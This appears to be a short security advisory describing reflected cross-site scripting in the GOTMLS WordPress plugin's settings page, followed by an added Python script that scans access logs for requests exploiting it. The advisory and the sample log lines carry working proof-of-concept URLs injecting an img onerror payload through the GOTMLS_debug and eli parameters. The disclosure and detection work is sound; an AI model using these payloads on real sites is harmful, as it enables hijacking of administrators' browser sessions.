The plugin does not sanitise and escape some parameters before outputting them back in an admin dashboard, leading to Reflected Cross-Site Scripting.
https://example.com/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3E
Also possible with the $_GET['eli'] parameter: http://example.com/wp-admin/admin.php?page=GOTMLS-settings&eli=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3E
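
A detection check for the requests shown above, added here as an example and not part of the original advisory: it scans access-log lines for requests to the GOTMLS-settings admin page whose GOTMLS_debug or eli parameter decodes to a value containing markup characters. The combined log format, the function names and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as reflected without escaping.
WATCHED_PARAMS = ("GOTMLS_debug", "eli")
PLUGIN_PAGE = "GOTMLS-settings"
# Characters needed to break out of an HTML or script context.
MARKUP = re.compile(r"[<>\"']")
# Request field of a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return {param: decoded value} for watched parameters carrying markup."""
    match = REQUEST.search(log_line)
    if not match:
        return {}
    url = urlsplit(match.group(1))
    if not url.path.endswith("/wp-admin/admin.php"):
        return {}
    # parse_qs percent-decodes values and turns '+' into a space.
    query = parse_qs(url.query, keep_blank_values=True)
    if PLUGIN_PAGE not in query.get("page", []):
        return {}
    hits = {}
    for name in WATCHED_PARAMS:
        for value in query.get(name, []):
            if MARKUP.search(value):
                hits[name] = value
    return hits

def scan(lines):
    """Return (1-based line number, hits) for every flagged log line."""
    flagged = ((n, suspicious_params(line)) for n, line in enumerate(lines, 1))
    return [(n, hits) for n, hits in flagged if hits]

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=GOTMLS-settings HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3E HTTP/1.1" 200 5300',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin.php?page=GOTMLS-settings&eli=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3E HTTP/1.1" 200 5300',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /wp-admin/admin.php?page=other-plugin&eli=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_LOG):
        print(line_no, hits)
```

A hit shows that a crafted link was requested, not that the script ran in an administrator's browser.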